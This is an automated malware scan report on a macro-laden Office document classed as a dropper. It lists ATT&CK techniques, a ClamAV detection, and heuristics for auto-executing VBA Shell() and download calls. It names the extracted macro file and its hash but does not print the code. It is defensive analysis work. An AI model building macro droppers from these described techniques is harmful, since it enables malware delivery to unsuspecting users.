Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical indicator of execution, and is flagged as an auto-executing macro (AutoOpen). This suggests the macro is designed to run automatically upon opening the document, likely to download and execute a secondary payload. The ClamAV detection name further supports its classification as a dropper.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6593935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6593935-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11755 bytes |

SHA-256: 951e9e5fd222b2d7dfc26f46fe87f34b1caab5ec98488a425309b408e5ed32ea
Preview script: first 1,000 lines of the extracted script